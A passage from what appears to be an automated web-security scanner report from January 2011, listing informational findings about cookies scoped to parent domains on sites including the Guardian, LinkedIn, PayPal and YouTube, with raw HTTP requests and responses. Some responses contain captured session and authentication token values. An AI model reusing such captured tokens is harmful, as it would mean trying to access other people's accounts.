Vary: Accept-Encoding,User-Agent
X-GU-httpd: 07
P3P: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONa TELa OUR IND ONLi UNI PURi NAV STA PRE LOC"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 20899

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...

13.218. http://www.guardian.co.uk/media/2011/jan/24/amazon-lovefilm-deal-films/x26amp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.guardian.co.uk
Path:	/media/2011/jan/24/amazon-lovefilm-deal-films/x26amp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

GU_MU=VFQyc2xRcjdERGtBQUJLenJTa0FBQUFhfElYV0o2UkFvL21wbDQ3R2hEWDJ0R2c9PQ==; path=/; domain=.guardian.co.uk; expires=Thu, 21-Jan-2021 16:45:09 GMT
GU_LOCATION=dXNhOjU6Zmw6NDpob2xseXdvb2Q6NDo1Mjg6YnJvYWRiYW5kOiAyNi4wNDg6LTgwLjEyNUAxNjEyOTYyMTg1OTMxNDExNDAzMjk3MTEyMDIxMDkyNzIzOTg3NTQ=; path=/; domain=.guardian.co.uk; expires=Mon, 14-Feb-2011 16:45:09 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/2011/jan/24/amazon-lovefilm-deal-films/x26amp HTTP/1.1
Host: www.guardian.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:45:09 GMT
Server: Apache
Set-Cookie: GU_MU=VFQyc2xRcjdERGtBQUJLenJTa0FBQUFhfElYV0o2UkFvL21wbDQ3R2hEWDJ0R2c9PQ==; path=/; domain=.guardian.co.uk; expires=Thu, 21-Jan-2021 16:45:09 GMT
Set-Cookie: GU_LOCATION=dXNhOjU6Zmw6NDpob2xseXdvb2Q6NDo1Mjg6YnJvYWRiYW5kOiAyNi4wNDg6LTgwLjEyNUAxNjEyOTYyMTg1OTMxNDExNDAzMjk3MTEyMDIxMDkyNzIzOTg3NTQ=; path=/; domain=.guardian.co.uk; expires=Mon, 14-Feb-2011 16:45:09 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-GU-httpd: 58
P3P: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONa TELa OUR IND ONLi UNI PURi NAV STA PRE LOC"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 20899

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...

13.219. http://www.guardian.co.uk/media/2011/jan/24/amazon-lovefilm-deal-films/x26source/x3duniv/x26sa/x3dX/x26ei/x3dh5I9TauLMMK88gazprSzCg/x26sqi/x3d2/x26ved/x3d0CHcQtgowCg/x22/x3eShared previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.guardian.co.uk
Path:	/media/2011/jan/24/amazon-lovefilm-deal-films/x26source/x3duniv/x26sa/x3dX/x26ei/x3dh5I9TauLMMK88gazprSzCg/x26sqi/x3d2/x26ved/x3d0CHcQtgowCg/x22/x3eShared

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

GU_MU=VFQyc21BcjdERGtBQUJLenJaZ0FBQUF2fGoxRDF3NkVwdXoyRzRZSm85RTN1Q1E9PQ==; path=/; domain=.guardian.co.uk; expires=Thu, 21-Jan-2021 16:45:12 GMT
GU_LOCATION=dXNhOjU6Zmw6NDpob2xseXdvb2Q6NDo1Mjg6YnJvYWRiYW5kOiAyNi4wNDg6LTgwLjEyNUAxNjUyMzAyMjA5OTIyMDEyMjc5MjUzMjQyMTgxNDM4NTIzOTEyMDU4NDU=; path=/; domain=.guardian.co.uk; expires=Mon, 14-Feb-2011 16:45:12 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/2011/jan/24/amazon-lovefilm-deal-films/x26source/x3duniv/x26sa/x3dX/x26ei/x3dh5I9TauLMMK88gazprSzCg/x26sqi/x3d2/x26ved/x3d0CHcQtgowCg/x22/x3eShared HTTP/1.1
Host: www.guardian.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:45:12 GMT
Server: Apache
Set-Cookie: GU_MU=VFQyc21BcjdERGtBQUJLenJaZ0FBQUF2fGoxRDF3NkVwdXoyRzRZSm85RTN1Q1E9PQ==; path=/; domain=.guardian.co.uk; expires=Thu, 21-Jan-2021 16:45:12 GMT
Set-Cookie: GU_LOCATION=dXNhOjU6Zmw6NDpob2xseXdvb2Q6NDo1Mjg6YnJvYWRiYW5kOiAyNi4wNDg6LTgwLjEyNUAxNjUyMzAyMjA5OTIyMDEyMjc5MjUzMjQyMTgxNDM4NTIzOTEyMDU4NDU=; path=/; domain=.guardian.co.uk; expires=Mon, 14-Feb-2011 16:45:12 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-GU-httpd: 58
P3P: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONa TELa OUR IND ONLi UNI PURi NAV STA PRE LOC"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 20899

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...

13.220. http://www.heroturko.org/n/Nonude-Young-and-Beauty-Pretty-Girl-teen-NN-usenet-binaries/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.heroturko.org
Path:	/n/Nonude-Young-and-Beauty-Pretty-Girl-teen-NN-usenet-binaries/x22

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

dle_user_id=deleted; expires=Sun, 24-Jan-2010 16:45:18 GMT; path=/; domain=.heroturko.org; httponly
dle_password=deleted; expires=Sun, 24-Jan-2010 16:45:18 GMT; path=/; domain=.heroturko.org; httponly
dle_hash=deleted; expires=Sun, 24-Jan-2010 16:45:18 GMT; path=/; domain=.heroturko.org; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.221. http://www.homes.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.homes.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

IS_MOBILE=false;domain=homes.com;expires=Tue, 25-Jan-2011 23:46:20 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.homes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.222. http://www.jobalot.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jobalot.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

CAKEPHP=aa3f49188b2ff5e884e64b9583b43ed3; expires=Fri, 25-Jan-2036 06:03:33 GMT; path=/; domain=.jobalot.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.jobalot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:03:33 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.2.9 mod_python/3.2.8 Python/2.4.3
X-Powered-By: PHP/5.2.9
Set-Cookie: CAKEPHP=aa3f49188b2ff5e884e64b9583b43ed3; expires=Fri, 25-Jan-2036 06:03:33 GMT; path=/; domain=.jobalot.com
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 7082
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Jobs and Employment
...[SNIP]...

13.223. http://www.linkedin.com/company/805465 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.linkedin.com
Path:	/company/805465

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

bcookie="v=1&6c07c4c1-6690-4d02-b09e-6b0aecb2966c"; Version=1; Domain=linkedin.com; Max-Age=2147483647; Expires=Sun, 12-Feb-2079 07:57:07 GMT; Path=/
lang="v=2&lang=en"; Version=1; Domain=linkedin.com; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /company/805465 HTTP/1.1
Host: www.linkedin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID="ajax:4114291373918205941"; Version=1; Path=/
P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE"
Set-Cookie: leo_auth_token="GST:UoW4AS-tuKNn5DcHUPtJAkw5UTo1RwdYXEpCAnyOqUgnfH_r88e9Gn:1295930580:095f9f787f0c0472ca72a7237529789a55194807"; Version=1; Max-Age=1799; Expires=Tue, 25-Jan-2011 05:12:59 GMT; Path=/
Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: visit=G; Expires=Sun, 12-Feb-2079 07:57:07 GMT; Path=/
Set-Cookie: bcookie="v=1&6c07c4c1-6690-4d02-b09e-6b0aecb2966c"; Version=1; Domain=linkedin.com; Max-Age=2147483647; Expires=Sun, 12-Feb-2079 07:57:07 GMT; Path=/
Set-Cookie: lang="v=2&lang=en"; Version=1; Domain=linkedin.com; Path=/
Location: http://www.linkedin.com/companies/kirshenbaum-bond-senecal-%2B-partners
Content-Language: en-US
Content-Length: 0
Date: Tue, 25 Jan 2011 04:43:00 GMT

13.224. http://www.livejournal.com/update.bml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.livejournal.com
Path:	/update.bml

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ljuniq=qSLA0OACBpHpEQx:1295930583:pgstats0:m0; expires=Saturday, 26-Mar-2011 04:43:03 GMT; domain=.livejournal.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /update.bml HTTP/1.1
Host: www.livejournal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.225. http://www.newsvine.com/_wine/save previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.newsvine.com
Path:	/_wine/save

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

vid=78a8cf29905fb686db7d439484f26124; expires=Mon, 20-Jan-2031 05:02:55 GMT; path=/; domain=.newsvine.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_wine/save HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.226. http://www.officedepot.com/promo.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.officedepot.com
Path:	/promo.do

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

cae_browser=desktop; path=/; domain=.officedepot.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /promo.do HTTP/1.1
Host: www.officedepot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.227. https://www.paypal.com/cgi-bin/webscr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/cgi-bin/webscr

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

cwrClyrK4LoCV1fydGbAxiNL6iG=HjCqYFc5CXevJqotkFvMFXXfoIhvN4EW-tKQaiEr8amgJtib0LN-pmWtmu8m4ykzPAW2XZqlpMiPKRHK4wvHNGkR63CpLZRW66OIADyLhqUeCW3OJL35JwPuquu9XtupCaGbkm%7c7MTs5u44SsQwlwsvfYBCh-eN7c-WopQW6ARNbpWah9zCNwXi7WheWGQ_fSWzNJZRd5Af5W%7cqZnpbU6jjFBhsFea-10nNBdj15bLnQiVDM35QkeV0xMIv34GNGCo06XR8iUJDMZcLQxoK0%7c1295914136; domain=.paypal.com; path=/; Secure; HttpOnly
KHcl0EuY7AKSMgfvHl7J5E7hPtK=DG0txL-D_ExP4tRfsCqsa40Ft5wDbFyjquJlxwVRFta791T3X2o2_RMTFJrbEaIkf1tYt_faGHrn0XU5; expires=Mon, 20-Jan-2031 00:08:57 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
navcmd=_home-general; domain=.paypal.com; path=/; Secure; HttpOnly
consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d7%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1; expires=Fri, 22-Jan-2021 00:08:57 GMT; domain=.paypal.com; path=/; Secure; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cgi-bin/webscr HTTP/1.1
Host: www.paypal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.228. http://www.tuenti.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tuenti.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ourl=deleted; expires=Mon, 25-Jan-2010 04:39:16 GMT; path=/; domain=.tuenti.com
manual_logout=deleted; expires=Mon, 25-Jan-2010 04:39:16 GMT; path=/; domain=.tuenti.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.tuenti.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 2005 04:59:59 GMT
Content-Type: text/html
Set-Cookie: ourl=deleted; expires=Mon, 25-Jan-2010 04:39:16 GMT; path=/; domain=.tuenti.com
Set-Cookie: manual_logout=deleted; expires=Mon, 25-Jan-2010 04:39:16 GMT; path=/; domain=.tuenti.com
X-Tuenti-State: logout
Connection: close
Date: Tue, 25 Jan 2011 04:39:17 GMT
Content-Length: 1619

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><meta http-equiv="
...[SNIP]...

13.229. https://www.tuenti.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.tuenti.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ourl=deleted; expires=Mon, 25-Jan-2010 04:39:28 GMT; path=/; domain=.tuenti.com
manual_logout=deleted; expires=Mon, 25-Jan-2010 04:39:28 GMT; path=/; domain=.tuenti.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.tuenti.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.230. http://www.veoh.com/videodetails2.swf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.veoh.com
Path:	/videodetails2.swf

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

veohCookie="VisitorUID=3C63CE89-84A4-E8E9-AE48-C8056B139C28&LastUpdate=24/Jan/2011:20:39:36 -0800&first=0"; domain=.veoh.com; Expires=Sat, 24 Jan 2015 04:39:36 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /videodetails2.swf HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Vary: Accept-Encoding
Set-Cookie: veohCookie="VisitorUID=3C63CE89-84A4-E8E9-AE48-C8056B139C28&LastUpdate=24/Jan/2011:20:39:36 -0800&first=0"; domain=.veoh.com; Expires=Sat, 24 Jan 2015 04:39:36 GMT; Path=/
Content-Length: 262
Date: Tue, 25 Jan 2011 04:39:36 GMT
Connection: close
Location: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf
Server: Apache/2.2.10 (Unix) PHP/5.2.6
Content-Type: text/html; charset=iso-8859-1
Keep-Alive: timeout=5, max=98

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.veoh.com/sta
...[SNIP]...

13.231. http://www.wireless.att.com/learn/articles-resources/community-support/recycling.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wireless.att.com
Path:	/learn/articles-resources/community-support/recycling.jsp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

TLTHID=3A374D86283D102802CDB8903992A194; Path=/; Domain=.att.com
TLTSID=3A374D86283D102802CDB8903992A194; Path=/; Domain=.att.com
TLTUID=3A374D86283D102802CDB8903992A194; Path=/; Domain=.att.com; Expires=Tue, 25-01-2021 04:40:25 GMT
ECOM_GTM=NA_osaln; domain=.att.com; expires=Wednesday, 25-Jan-2012 04:40:25 GMT; path=/
browserid=A001361839192; domain=.att.com; expires=Wednesday, 25-Jan-2012 04:40:25 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /learn/articles-resources/community-support/recycling.jsp HTTP/1.1
Host: www.wireless.att.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref=""/w3c/p3p.xml"", CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA GOV"
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4xcDMgWyBEUFNMaWNlbnNlLzAgIF0=
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Tue, 25 Jan 2011 04:40:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 25 Jan 2011 04:40:25 GMT
Content-Length: 32021
Connection: close
Set-Cookie: TLTHID=3A374D86283D102802CDB8903992A194; Path=/; Domain=.att.com
Set-Cookie: TLTSID=3A374D86283D102802CDB8903992A194; Path=/; Domain=.att.com
Set-Cookie: TLTUID=3A374D86283D102802CDB8903992A194; Path=/; Domain=.att.com; Expires=Tue, 25-01-2021 04:40:25 GMT
Set-Cookie: B2CSESSIONID=m83KN2JZpgQXGw!356831932; path=/; HttpOnly
Set-Cookie: DYN_USER_ID=3531123409; path=/
Set-Cookie: DYN_USER_CONFIRM=2afae30a32d18177a2afef4e6b409767; path=/
Set-Cookie: ECOM_GTM=NA_osaln; domain=.att.com; expires=Wednesday, 25-Jan-2012 04:40:25 GMT; path=/
Set-Cookie: cust_type=new; domain=.att.com; expires=Wednesday, 25-Jan-2012 04:40:25 GMT; path=/
Set-Cookie: browserid=A001361839192; domain=.att.com; expires=Wednesday, 25-Jan-2012 04:40:25 GMT; path=/
Set-Cookie: svariants=NA; domain=.att.com; expires=Wednesday, 25-Jan-2012 04:40:25 GMT; path=/
Set-Cookie: BIGipServerpWL_7010_7011=1776406919.25115.0000; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html lang="en">
<head>
<title>AT&T Reuse & Recycle - Wireless from AT&T </title
...[SNIP]...

13.232. http://www.youtube.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.youtube.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

PREF=f1=50000000; path=/; domain=.youtube.com; expires=Thu, 21-Jan-2021 16:01:43 GMT
GEO=930f412dd946c393c719c45b1db7c824cwsAAAAzVVOtwdbzTT2iZw==; path=/; domain=.youtube.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?hl=en&tab=w1 HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VISITOR_INFO1_LIVE=2tNl54hzFtE; use_hitbox=3d11d5cb2b3e40e368f83f82e88170a4dAEAAAAx; GEO=5b80f4299f7903fea6e2637fc3585e04cwsAAAAzVVOtwdbzTTzh/A==;

Response

13.233. http://www.youtube.com/results previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.youtube.com
Path:	/results

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PREF=f1=50000000; path=/; domain=.youtube.com; expires=Thu, 21-Jan-2021 16:01:47 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /results?hl=en&q=ges&um=1&ie=UTF-8&sa=N&tab=w1 HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VISITOR_INFO1_LIVE=2tNl54hzFtE; use_hitbox=3d11d5cb2b3e40e368f83f82e88170a4dAEAAAAx; GEO=5b80f4299f7903fea6e2637fc3585e04cwsAAAAzVVOtwdbzTTzh/A==;

Response

HTTP/1.1 303 See Other
Date: Mon, 24 Jan 2011 16:01:47 GMT
Server: wiseguy/0.6.7
Content-Length: 0
X-Content-Type-Options: nosniff
Set-Cookie: PREF=f1=50000000; path=/; domain=.youtube.com; expires=Thu, 21-Jan-2021 16:01:47 GMT
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Location: http://www.youtube.com/das_captcha?next=http%3A//www.youtube.com/results%3Fhl%3Den%26q%3Dges%26um%3D1%26ie%3DUTF-8%26sa%3DN%26tab%3Dw1
Connection: close

13.234. http://www.youtube.com/subscribe_widget previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.youtube.com
Path:	/subscribe_widget

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
GEO=0341a4aa07c201d99d06557f57bd4ecbcwsAAAAzVVOtwdbzTTzh+w==; path=/; domain=.youtube.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /subscribe_widget?p=joomla HTTP/1.1
Host: www.youtube.com
Proxy-Connection: keep-alive
Referer: http://community.joomla.org/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VISITOR_INFO1_LIVE=2tNl54hzFtE

Response

13.235. http://www.zazzle.com/netlingo previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.zazzle.com
Path:	/netlingo

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

zm=AQABAAAA8wcAABRS51j4EtDi9_oXt9FxROJyObhwRurz-b1BlGyLguagTvY6WTBoBb1sgEeFFIX6rKczW8ChxGhUVBWXLHNva6BIym6yAoY-4StNvvJUN6oKQP5Gr9F6snKOWkSXH-nGNXDxyJQV; domain=.zazzle.com; path=/
zs=6502D26E-A4F0-4420-AEC5-26B4B55758F8%7c0%7c12940404058%7c; domain=.zazzle.com; expires=Tue, 01-Jan-2036 08:00:00 GMT; path=/
us=FA9F74DB-FD90-49BE-A241-2728DB49B0ED; domain=.zazzle.com; expires=Tue, 01-Jan-2036 08:00:00 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /netlingo?rf=238222574511555904 HTTP/1.1
Host: www.zazzle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 0
Expires: -1
Location: /netlingo
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: rfm=rf%3d238222574511555904%26rfd%3d348679991; path=/;
Set-Cookie: qsp=nu%3d%2fnetlingo%3frf%3d238222574511555904; path=/;
Set-Cookie: zm=AQABAAAA8wcAABRS51j4EtDi9_oXt9FxROJyObhwRurz-b1BlGyLguagTvY6WTBoBb1sgEeFFIX6rKczW8ChxGhUVBWXLHNva6BIym6yAoY-4StNvvJUN6oKQP5Gr9F6snKOWkSXH-nGNXDxyJQV; domain=.zazzle.com; path=/
Set-Cookie: zs=6502D26E-A4F0-4420-AEC5-26B4B55758F8%7c0%7c12940404058%7c; domain=.zazzle.com; expires=Tue, 01-Jan-2036 08:00:00 GMT; path=/
Set-Cookie: us=FA9F74DB-FD90-49BE-A241-2728DB49B0ED; domain=.zazzle.com; expires=Tue, 01-Jan-2036 08:00:00 GMT; path=/
Set-Cookie: general%5Fmaturity=1; domain=.zazzle.com; path=/
Set-Cookie: s=5246001291012673539; path=/
Date: Tue, 25 Jan 2011 04:40:58 GMT

13.236. http://www1.whdh.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

WHDHSTR=b67ab8cd4dbb526d8d29bbf7eb21f1ca; expires=Wed, 25-Jan-2012 21:54:00 GMT; path=/; domain=.whdh.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www1.whdh.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:55:08 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Set-Cookie: WHDHSTR=b67ab8cd4dbb526d8d29bbf7eb21f1ca; expires=Wed, 25-Jan-2012 21:54:00 GMT; path=/; domain=.whdh.com
Age: 0
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
X-doRedirect: false;
X-Version: 1.0;
Expires: Mon, 24 Jan 2011 21:55:08 GMT
Cache-Control: private, max-age=300
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 60121
Via: 1.1 dfw107022 (MII-APC/1.6)

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH 7NEWS NBC Boston/Regional News, Weather, Traffic, Sports, Entertainment Coverage
...[SNIP]...

13.237. http://www3.whdh.com/mobile/phoneforecast/settings.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www3.whdh.com
Path:	/mobile/phoneforecast/settings.php

Issue detail

